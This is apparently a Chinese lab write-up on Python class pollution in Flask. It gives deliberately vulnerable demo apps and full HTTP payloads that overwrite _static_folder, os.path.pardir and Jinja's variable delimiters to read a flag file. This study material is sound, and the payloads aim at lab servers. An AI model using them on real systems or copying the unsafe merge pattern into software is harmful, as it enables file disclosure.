还得是服务器啊,本地老是出问题,不知道为啥

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
POST / HTTP/1.1
Host: ip:5000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: psession=65b25e9d-b6c8-4b71-bb63-9417e0d14c45
Connection: close
Content-Type: application/json
Content-Length: 142

{
"__init__":{
"__globals__":{
"app":{
"_static_folder":"./"
}
}
}
}

然后污染成功就可以啦

1
2
3
4
5
6
7
8
9
10
11
12
GET /static/flag HTTP/1.1
Host: ip:5000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: psession=65b25e9d-b6c8-4b71-bb63-9417e0d14c45
Connection: close


注意搭建环境的时候目录是这样的

1

os.path.pardir

这里test时把static文件夹改成templates

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
from flask import Flask,request,render_template
import json
import os

app = Flask(__name__)

def merge(src, dst):
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)

class cls():
def __init__(self):
pass

instance = cls()

@app.route('/',methods=['POST', 'GET'])
def index():
if request.data:
merge(json.loads(request.data), instance)
return "flag in ./flag but u just can use /file to vist ./templates/file"

@app.route("/<path:path>")
def render_page(path):
if not os.path.exists("templates/" + path):
return "not found", 404
return render_template(path)

app.run(host="0.0.0.0",port=5000,debug=True)

这里很明显我们要目录穿越,但是它只让我们查看/templates里面的文件,那怎么办呢,先穿越,打出报错(但是像之前进行pin码计算一样,我也不能稳定的打出报错),访问/test.py打出报错,由于我们这里是因为渲染的报错,所以我们跟进这个

2

使用Ctrl+鼠标左键跟进来之后发现

1

继续跟进,注意我们这里是因为path的原因导致的渲染失败,所以我们进来找path

1

这个函数把我们的路径进行拆分,估计是这里有问题,还有就是我标的那个符号,引用Infernity师傅的话

这个符号名为重写符号,对父类进行重写,我们跟进的时候只需要看自己需要哪个,就找哪个

所以这里我们是路径问题,找到了第二个get_source函数,继续跟进

2

欧克啊终于是找到了,那么污染

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
POST / HTTP/1.1
Host: ip:5000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: psession=65b25e9d-b6c8-4b71-bb63-9417e0d14c45
Connection: close
Content-Type: application/json
Content-Length: 179

{
"__init__":{
"__globals__":{
"os":{
"path":{
"pardir":"?"
}
}
}
}
}
1
2
3
4
5
6
7
8
9
10
11
12
GET /../flag HTTP/1.1
Host: ip:5000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: psession=65b25e9d-b6c8-4b71-bb63-9417e0d14c45
Connection: close


jinja_SSTI

大家常见的是{{}},但是有些特殊情况有这个是,那么我们就可以污染一下,使得其他符号也能做到相同的效果

1
2
3
4
5
<html>
<h1>Look this -> [[flag]] <- try to make it become the real flag</h1>
<body>
</body>
</html>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
from flask import Flask,request,render_template
import json

app = Flask(__name__)

def merge(src, dst):
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)

class cls():
def __init__(self):
pass

instance = cls()

@app.route('/',methods=['POST', 'GET'])
def index():
if request.data:
merge(json.loads(request.data), instance)
return "go check /index before merge it"


@app.route('/index',methods=['POST', 'GET'])
def templates():
return render_template("index.html", flag = open("flag", "rt").read())

app.run(host="0.0.0.0",port=5000,debug=True)

这边尝试了一会儿,都拿不到报错消息,那我们本是是不是jinja的问题,那我们直接进flask,这里的目的就是污染jinja标识符为[[]],那样子我们就可以拿到flag了,找不到跟进哪里了,那看看官方文档https://jinja.palletsprojects.com/en/3.1.x/api/#jinja2.Environment

1

然后还是找不到,不过我们知道了一些重要消息,variable_start_stringvariable_end_string,直接问AI知道是这里

2

好了,这里我们直接跟进,发现啥玩意,找不到任何东西

1

很显然么有任何用,但是看了看也才200多行,可以直接浏览一下,发现有很多类似于这种东西app.jinja_env.from_string,那我们此时直接替换成我们的不就可以了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
POST / HTTP/1.1
Host: ip:5000
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: psession=65b25e9d-b6c8-4b71-bb63-9417e0d14c45
Connection: close
Content-Type: application/json
Content-Length: 250

{
"__init__":{
"__globals__":{
"app":{
"jinja_env":{
"variable_start_string":"[[",
"variable_end_string":"]]"
}
}
}
}
}

再访问index就拿到flag了,但是这里仍然有个小细节,就是如果直接跟着提示进入了/index,那么再次进行污染是不会被解析的

Flask默认会对一定数量内的模板文件编译渲染后进行缓存,下次访问时若有缓存则会优先渲染缓存,所以输入payload污染之后虽然语法标识符被替换了,但渲染的内容还是按照污染前语生成的缓存,由于缓存编译时并没有存在flag变量,所以自然没有被填充flag

所以我们要先污染,再进行访问

padash

这个模块里面的函数和merge基本相同,同样可以做到污染的事情,后面再研究

0x03 小结

太优雅了,而且在这个过程中学会了跟进代码去审计,知道原理逻辑,虽然确实中间调试的时候会花费很多时间但是很开心!不过这里所提及的东西还是太过浅显,包括劫持等操作,后面还会探讨

0x04 reference

Infernity师傅对于代码审计部分的一些基本操作的帮助(第一次跟进,感觉很舒服)

期间还问了一些师傅其他问题,最后自己慢慢调试解决问题,谢谢师傅们的帮助啦

网上的文章都有看,谢谢师傅们!